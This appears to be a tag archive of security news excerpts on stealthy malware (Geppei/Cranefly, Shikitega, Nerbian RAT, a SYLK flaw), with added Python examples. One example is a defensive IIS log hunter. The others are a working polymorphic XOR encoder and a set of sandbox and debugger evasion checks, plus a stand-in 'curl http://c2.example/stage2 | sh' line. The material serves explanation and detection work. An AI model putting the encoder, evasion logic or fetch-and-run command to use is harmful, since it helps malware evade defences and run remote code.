Tag Archive for: Stealthy

Symantec researchers find new hacking tools used in stealthy ‘Cranefly’ campaign


A new research paper released today by Symantec, a division of Broadcom Inc., details previously unknown tools and techniques used in a stealthy campaign by a suspected threat actor.

A dropper called Trojan.Geppei is being used by a threat actor Symantec has dubbed “Cranefly” (tracked by Mandiant as UNC3524) to install previously undocumented malware known as Danfuan and other tools. Geppei uses the novel technique of reading its commands from Internet Information Services (IIS) logs, something Symantec’s researchers say they have never seen used in real-world attacks before.

The Cranefly attack group was first detected by researchers at Mandiant in May and was described as heavily targeting the emails of employees that dealt with corporate development, mergers and acquisitions and large corporate transactions.

Standing out from typical attack groups, Cranefly has a particularly long dwell time, often spending at least 18 months on a victim’s network while staying under the radar. Avoidance techniques include installing backdoors on appliances that don’t support security tools, such as SAN arrays, load balancers and wireless access point controllers.

Geppei is a Python script converted into an executable with PyInstaller, and it reads its commands from legitimate IIS logs. IIS records every request made to the web pages and applications it hosts, so the attackers can send commands to a compromised web server by disguising them as ordinary web access requests. IIS logs those requests as normal, but Geppei parses the log entries and extracts the commands from them.

The commands read by Geppei contain malicious encoded .ashx files. Those files are saved to an arbitrary folder and run as backdoors. The attackers’ requests carry marker strings that do not normally appear in IIS log files, and Geppei uses those same strings to pick the malicious requests out of the log when it parses it.

The backdoors dropped by Geppei include Hacktool.Regeorg, a known web shell that creates a SOCKS proxy, but that is not the interesting one. The previously unknown Danfuan is a DynamicCodeCompiler: built on .NET dynamic compilation technology, it receives C# code, compiles it in memory and executes it, giving the attackers a backdoor on the infected system.
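The log-reading channel described above has a defensive mirror image: if commands arrive as HTTP requests that IIS dutifully logs, a hunter can parse the same logs and look for request fields carrying encoded payloads. The script below is an added example (not Symantec’s or the malware’s code) that parses the W3C extended format IIS writes, inspects the URI stem and query of each record, and flags long base64-like runs, especially ones that decode to something shaped like an .ashx handler. The regex, entropy threshold, payload hints and the log itself are constructed for the example.

```python
"""Scan IIS W3C logs for requests that carry encoded payloads.

Added example (not Symantec's or the malware's code). The page describes
Geppei reading its commands out of legitimate IIS logs, where the commands
arrive inside HTTP requests that IIS logs like any other. This hunting
script parses the W3C extended format IIS writes, looks at the URI stem
and query of every request, and flags long base64-like runs, especially
ones that decode to something shaped like an .ashx handler. The regex,
thresholds and payload hints are illustrative assumptions, and the log
below is constructed for the example.
"""
import base64
import binascii
import math
import re
from collections import Counter

# A handler stub standing in for the encoded .ashx files the report describes.
_ASHX = (b'<%@ WebHandler Language="C#" Class="H" %>\n'
         b'public class H : System.Web.IHttpHandler { '
         b'public void ProcessRequest(System.Web.HttpContext c) { } '
         b'public bool IsReusable { get { return false; } } }')
ENCODED = base64.b64encode(_ASHX).decode()

# Constructed sample log: two normal hits, a long but low-entropy session
# token, and one request smuggling the encoded handler in its query string.
SAMPLE_LOG = f"""#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2022-10-20 00:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2022-10-20 08:01:12 10.0.0.5 GET /index.html - 80 - 203.0.113.10 Mozilla/5.0 200
2022-10-20 08:02:30 10.0.0.5 GET /search.aspx q=quarterly+report&page=2 80 - 203.0.113.10 Mozilla/5.0 200
2022-10-20 08:02:41 10.0.0.5 GET /app.aspx session={'abcdef' * 8} 80 - 203.0.113.10 Mozilla/5.0 200
2022-10-20 08:04:45 10.0.0.5 GET /img/logo.png cmd={ENCODED} 80 - 198.51.100.7 Mozilla/5.0 404
"""

B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
PAYLOAD_HINTS = (b"<%@ WebHandler", b"IHttpHandler", b"ProcessRequest", b"System.Web")


def parse_w3c(text):
    """Yield one dict per record, using the most recent #Fields: directive."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("record before any #Fields: directive")
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed or truncated record; skip rather than misalign
        yield dict(zip(fields, values))


def shannon_entropy(s):
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def decode_candidate(blob):
    """Strict base64 decode; IIS logs the raw query, so '=' padding survives."""
    try:
        return base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None


def scan(text, min_entropy=4.5):
    """Return one finding per suspicious base64-like run in a URI stem or query."""
    findings = []
    for rec in parse_w3c(text):
        for field in ("cs-uri-stem", "cs-uri-query"):
            for m in B64_RUN.finditer(rec.get(field, "-")):
                blob = m.group(0)
                decoded = decode_candidate(blob)
                hint = decoded is not None and any(h in decoded for h in PAYLOAD_HINTS)
                entropy = shannon_entropy(blob)
                if hint or entropy >= min_entropy:
                    findings.append({
                        "time": f"{rec['date']} {rec['time']}",
                        "c-ip": rec["c-ip"],
                        "field": field,
                        "length": len(blob),
                        "entropy": round(entropy, 2),
                        "payload_hint": hint,
                        "preview": (decoded or b"")[:40],
                    })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Two design points matter in practice. Records are skipped rather than guessed at when the field count does not match the `#Fields:` line, because IIS can change the field layout mid-file and a misaligned record would attribute a payload to the wrong client. The entropy gate keeps long but repetitive values such as session tokens out of the findings; the decode-and-inspect step catches a handler even if an operator pads it to lower the entropy.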

Just who is behind Cranefly and Danfuan is…

Source…

New Stealthy Shikitega Malware Targeting Linux Systems and IoT Devices


New Stealthy Shikitega Malware

A new piece of stealthy Linux malware called Shikitega has been uncovered adopting a multi-stage infection chain to compromise endpoints and IoT devices and deposit additional payloads.

“An attacker can gain full control of the system, in addition to the cryptocurrency miner that will be executed and set to persist,” AT&T Alien Labs said in a new report published Tuesday.

The findings add to a growing list of Linux malware that has been found in the wild in recent months, including BPFDoor, Symbiote, Syslogk, OrBit, and Lightning Framework.


Once deployed on a targeted host, the attack chain downloads and executes Metasploit’s “Mettle” Meterpreter payload to maximize control, exploits vulnerabilities to elevate its privileges, adds persistence on the host via crontab, and ultimately launches a cryptocurrency miner on infected devices.

The exact method by which the initial compromise is achieved remains unknown as yet, but what makes Shikitega evasive is its ability to download next-stage payloads from a command-and-control (C2) server and execute them directly in memory.


Privilege escalation is achieved by means of exploiting CVE-2021-4034 (aka PwnKit) and CVE-2021-3493, enabling the adversary to abuse the elevated permissions to fetch and execute the final stage shell scripts with root privileges to establish persistence and deploy the Monero crypto miner.


In a further attempt to fly under the radar, the malware operators employ a “Shikata ga nai” polymorphic encoder to make it more difficult to detect by antivirus engines and abuse legitimate cloud services for C2 functions.
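To make the polymorphic-encoder point concrete, the following is an added example (not code from AT&T Alien Labs or from Metasploit) that models the arithmetic behind an additive-feedback XOR encoder of the “Shikata ga nai” kind: each 4-byte word is XORed with a running 32-bit key, and the key is then advanced by adding the decoded word. The real encoder also emits a randomized x86 decoder stub; that stub, the zero padding and the feedback direction are this model’s assumptions. The payload string is a constructed stand-in.

```python
"""Additive-feedback XOR encoding in the spirit of "Shikata ga nai".

Added example, not code from AT&T Alien Labs or from Metasploit. The real
encoder emits a randomized x86 decoder stub in front of the payload; this
model keeps only the arithmetic the stub performs: each 4-byte little-endian
word is XORed with a running 32-bit key, and the key is then advanced by
adding the decoded word (the feedback direction is this model's assumption).
A fresh random key per run means the same payload never encodes to the same
bytes twice, which is what defeats static byte signatures on the body.
"""
import os
import struct

MASK = 0xFFFFFFFF


def _words(data):
    """Split into 4-byte words, zero-padding the tail (real stubs pad with junk; assumption)."""
    data = data + b"\x00" * (-len(data) % 4)
    return [struct.unpack_from("<I", data, i)[0] for i in range(0, len(data), 4)]


def encode(payload, key=None):
    """Return (key, blob). The key is random unless given (fixed keys only for tests)."""
    if key is None:
        key = struct.unpack("<I", os.urandom(4))[0]
    k, out = key, bytearray()
    for word in _words(payload):
        out += struct.pack("<I", word ^ k)
        k = (k + word) & MASK        # feedback from the plaintext word
    return key, bytes(out)


def decode(key, blob):
    """Mirror of encode: recover each word, then advance the key the same way."""
    k, out = key, bytearray()
    for enc in _words(blob):
        word = enc ^ k
        out += struct.pack("<I", word)
        k = (k + word) & MASK
    return bytes(out)


def overlapping_words(a, b):
    """Number of 4-byte positions at which two encoded blobs are identical."""
    return sum(1 for x, y in zip(_words(a), _words(b)) if x == y)


def polymorphism_check(payload):
    """Encode twice with random keys: both must decode, and no word should repeat."""
    k1, b1 = encode(payload)
    k2, b2 = encode(payload)
    ok = decode(k1, b1)[:len(payload)] == payload == decode(k2, b2)[:len(payload)]
    return ok, overlapping_words(b1, b2)


if __name__ == "__main__":
    sample = b"/bin/sh -c 'curl http://c2.example/stage2 | sh'"  # constructed stand-in
    print(polymorphism_check(sample))
```

Because both runs advance their keys by the same plaintext words, the difference between the two key streams stays constant and non-zero, so every encoded word differs between runs, not just the first. That is why detection has to move to the decoder stub or to behaviour after decoding rather than to the body bytes, and why the stub itself is randomized in the real encoder.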

“Threat actors continue to search for ways to deliver malware in new ways to stay under the radar and avoid detection,” AT&T Alien Labs researcher Ofer Caspi said.

“Shikitega malware is delivered in a sophisticated way, it uses a polymorphic encoder, and it gradually delivers its payload where each step reveals only part of the total payload.”

Source…



New stealthy Nerbian RAT malware spotted in ongoing attacks



A new remote access trojan called Nerbian RAT has been discovered that includes a rich set of features, including the ability to evade detection and analysis by researchers.

The new malware variant is written in Go, making it a cross-platform 64-bit threat, and it’s currently distributed via a small-scale email distribution campaign that uses document attachments laced with macros.

The email campaigns were discovered by researchers at Proofpoint, who released a report today on the new Nerbian RAT malware.

Impersonating the WHO

The malware campaign distributing Nerbian RAT impersonates the World Health Organization (WHO), which is allegedly sending COVID-19 information to the targets.

Phishing email seen in the latest campaign (Proofpoint)

The RAR attachments contain Word documents laced with malicious macro code. If a document is opened in Microsoft Office with macros enabled, a .bat file runs a PowerShell command that downloads a 64-bit dropper.

The dropper, named “UpdateUAV.exe,” is also written in Go and is packed with UPX to keep its size manageable.

UpdateUAV reuses code from various GitHub projects to incorporate a rich set of anti-analysis and detection-evasion mechanisms before Nerbian RAT is deployed.

Apart from that, the dropper also establishes persistence by creating a scheduled task that launches the RAT every hour.

Proofpoint summarizes the list of anti-analysis tools as follows:

  • Check for the existence of reverse engineering or debugging programs in the process list
  • Check for suspicious MAC addresses
  • Check the WMI strings to see if disk names are legitimate
  • Check if the hard disk size is below 100GB, which is typical for virtual machines
  • Check if there are any memory analysis or tampering detection programs present in the process list
  • Check the amount of time elapsed since execution and compare it with a set threshold
  • Use the IsDebuggerPresent API to determine if the executable is being debugged

All these checks make it hard to get the RAT running in a sandboxed, virtualized environment unless the analysis host is tailored to pass them, which helps the malware operators stay undetected for longer.
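To see what those seven checks look like as decision logic, and therefore what an analysis VM has to spoof to pass each one, the following is an added example (not Proofpoint’s or the malware’s code) that models them as pure functions over facts gathered from the host. The tool names, vendor OUIs, disk-model markers and sleep tolerance are this example’s assumptions; the 100 GB disk rule and the IsDebuggerPresent call come from the list above. The two host profiles are constructed.

```python
"""Model of the sandbox and debugger checks Proofpoint lists for the Nerbian dropper.

Added example, not Proofpoint's or the malware's code. Each check is a pure
function over facts gathered from the host, so the decision logic can be run
and tuned (and the spoofing each check needs can be seen) without a VM. The
tool names, vendor OUIs, disk markers and sleep tolerance are this example's
assumptions; the "below 100 GB" disk rule comes from the list above.
"""
import ctypes
import sys
from dataclasses import dataclass

DEBUGGERS = {"x64dbg.exe", "x32dbg.exe", "ollydbg.exe", "ida64.exe", "ida.exe",
             "windbg.exe", "dnspy.exe", "procmon.exe", "procexp.exe", "wireshark.exe"}
MEMORY_TOOLS = {"pe-sieve.exe", "hollows_hunter.exe", "moneta.exe", "volatility.exe"}
VM_OUIS = {"00:05:69": "VMware", "00:0c:29": "VMware", "00:1c:14": "VMware",
           "00:50:56": "VMware", "08:00:27": "VirtualBox", "00:15:5d": "Hyper-V",
           "00:16:3e": "Xen", "00:1c:42": "Parallels"}
VM_DISK_MARKERS = ("vbox", "vmware", "virtual", "qemu")
MIN_DISK_GB = 100
SLEEP_TOLERANCE = 0.9   # sleep counts as skipped if under 90 % of the wait elapsed


@dataclass
class HostFacts:
    processes: list          # image names from the process list
    macs: list               # adapter MAC addresses
    disk_models: list        # Win32_DiskDrive.Model strings from WMI
    disk_total_gb: float     # size of the system disk
    sleep_requested: float   # seconds the sample asked to sleep
    sleep_observed: float    # wall-clock seconds that actually passed


def check_process_list(procs, names):
    return sorted({p for p in procs if p.lower() in names})


def check_mac(macs):
    return [(m, VM_OUIS[m.lower()[:8]]) for m in macs if m.lower()[:8] in VM_OUIS]


def check_disk_models(models):
    return [m for m in models if any(k in m.lower() for k in VM_DISK_MARKERS)]


def check_disk_size(total_gb):
    return total_gb < MIN_DISK_GB


def check_sleep_skipped(requested, observed):
    """Sandboxes often fast-forward sleeps; a short observed wait gives them away."""
    return observed < requested * SLEEP_TOLERANCE


def is_debugger_present():
    """Windows-only: the IsDebuggerPresent API; reports False on other platforms."""
    if sys.platform != "win32":
        return False
    return bool(ctypes.windll.kernel32.IsDebuggerPresent())


def evaluate(h):
    """Names of the checks that fired; a dropper like this one would bail out if any did."""
    fired = []
    if check_process_list(h.processes, DEBUGGERS):
        fired.append("debugger_process")
    if check_mac(h.macs):
        fired.append("vm_mac")
    if check_disk_models(h.disk_models):
        fired.append("vm_disk_model")
    if check_disk_size(h.disk_total_gb):
        fired.append("small_disk")
    if check_process_list(h.processes, MEMORY_TOOLS):
        fired.append("memory_tool")
    if check_sleep_skipped(h.sleep_requested, h.sleep_observed):
        fired.append("sleep_skipped")
    if is_debugger_present():
        fired.append("debugger_api")
    return fired


# Constructed facts for a default VirtualBox sandbox and a typical workstation.
SANDBOX = HostFacts(["explorer.exe", "x64dbg.exe", "pe-sieve.exe"], ["08:00:27:4e:66:a1"],
                    ["VBOX HARDDISK ATA Device"], 60.0, 120.0, 3.0)
WORKSTATION = HostFacts(["explorer.exe", "outlook.exe", "teams.exe"], ["a4:bb:6d:10:20:30"],
                        ["Samsung SSD 970 EVO 1TB"], 931.5, 120.0, 120.2)

if __name__ == "__main__":
    print("sandbox:", evaluate(SANDBOX))
    print("workstation:", evaluate(WORKSTATION))
```

Read the `evaluate` result as a to-do list for the sandbox: every fired check names one artifact (a process name, a MAC prefix, a WMI model string, a disk size, a fast-forwarded sleep) that the analysis environment has to present as a real workstation would before this family will detonate in it.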

Nerbian RAT features

The trojan is downloaded as “MoUsoCore.exe” and is saved to…

Source…

An ’80s File Format Enabled Stealthy Mac Hacking

The now-patched vulnerability would have let hackers target Microsoft Office using Symbolic Link (SYLK), a spreadsheet file format that hasn’t been in common use in over 30 years.